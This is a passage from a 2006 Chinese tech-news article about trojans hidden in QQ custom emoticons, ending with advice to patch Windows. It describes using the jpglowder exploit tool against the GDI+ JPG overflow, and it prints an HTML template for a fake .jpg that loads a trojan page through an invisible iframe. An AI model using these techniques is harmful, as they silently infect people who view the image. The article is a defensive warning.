木马横行提防QQ表情背后隐藏的阴谋--中华网--科技频道

新闻 | 军事 | 论坛 | 汽车 | 科　技 | 游戏 | 娱乐 | 女人 | 时尚 | 留学 | 旅游 | 购车 | 食品 | 文化 | ３Ｇ | 教育 | 音乐 | 邮箱 | 公益 | 求医
财经 | 军史 | 博客 | 搜车 | 实拍 | 网游 | 明星 | 城市 | 篮球 | 数码 | 智游 | 亲子 | 社会 | 文史 | 健康 | 图库 | 电影 | 问答 | 评论 | 时尚

木马横行提防QQ表情背后隐藏的阴谋(2)

中华网科技 http://tech.china.com 2006-04-29 14:54:19

【进入BBS】【进入聊天室】【推荐给朋友】【浏览字号：大中小】【关闭窗口】

　　
　　1.利用漏洞种植木马

　　这种方法是通过Windows系统以及应用程序的漏洞而产生的，比如2004年的“Windows GDI+ JPG解析组件缓冲区溢出漏洞”、“Windows图形渲染引擎安全漏洞”，2005年的“MSN Messenger PNG图片解析远程代码执行漏洞”，以及今年的“Windows图形渲染引擎WMF格式代码执行漏洞”都是和图形图像有关的漏洞。

　　下面就以“Windows GDI+ JPG解析组件缓冲区溢出漏洞”为例，为大家讲解图片木马的生成过程。

　　在命令提示符下激活漏洞利用工具jpglowder，查看工具的使用方法（如图2）。漏洞利用工具包含了多个命令参数。

　　要利用这个漏洞生成图片木马，只要使用工具内置参数“d”即可，通过输入一段含有木马的网页链接，就可以生成需要的图片木马。

　　2.利用HTML代码种植木马

　　这种利用HTML代码制作的图片木马，其实就是传统的网页木马的一种变种而已。打开记事本程序输入如下代码，并将代码另存为plmm.jpg。
＜html＞＜body＞
＜iframe src="网页木马地址" width="0" height="0" frameborder="0"＞＜/iframe＞
＜center>＜img src="真实的图片地址"＞＜/img＞＜/center＞
＜/body＞＜/html＞

　　这里通过一个跳转命令连链到一个网页木马的地址。

　　定点防范，找准关键

　　其实，通过图片进行木马传播已经是个老技术了。但是现在黑客通过QQ的自定义表情来主动种植木马还是要引起我们的高度重视。

　　我们可以看到，图片木马和网页木马一样，要利用系统的漏洞才能被种植进系统，所以我们可以发现，方俊朋友在安装了各种杀毒软件和防火墙后，没有及时打上系统漏洞补丁，才让黑客有可乘之机。

　　所以我们防范通过QQ自定义表情来种植木马的关键就是及时为系统打上漏洞补丁（大家可以根据自己系统情况到http://www.microsoft.com下载相应补丁包），即使是不能在第一时间安装系统的安全补丁，也可以通过使用第三方提供的补丁进行防范。

【发表评论】

中华搜索	更多"QQ表情　木马" 的相关消息

首页上页 | 1 | 2 | 下页尾页共 2 页

作者：电脑报　来源：　

发表言论：

笔　　名：

查看评论

﹣相关报道
﹣拒绝诱惑如何有效防御网游外挂木马 (2006-04-13 16:10:35) ﹣狂客木马加速传播被感染计算机成肉鸡 (2006-03-21 17:40:55) ﹣拒绝不速之客入侵拆穿木马伪装七计 (2006-02-28 16:12:10)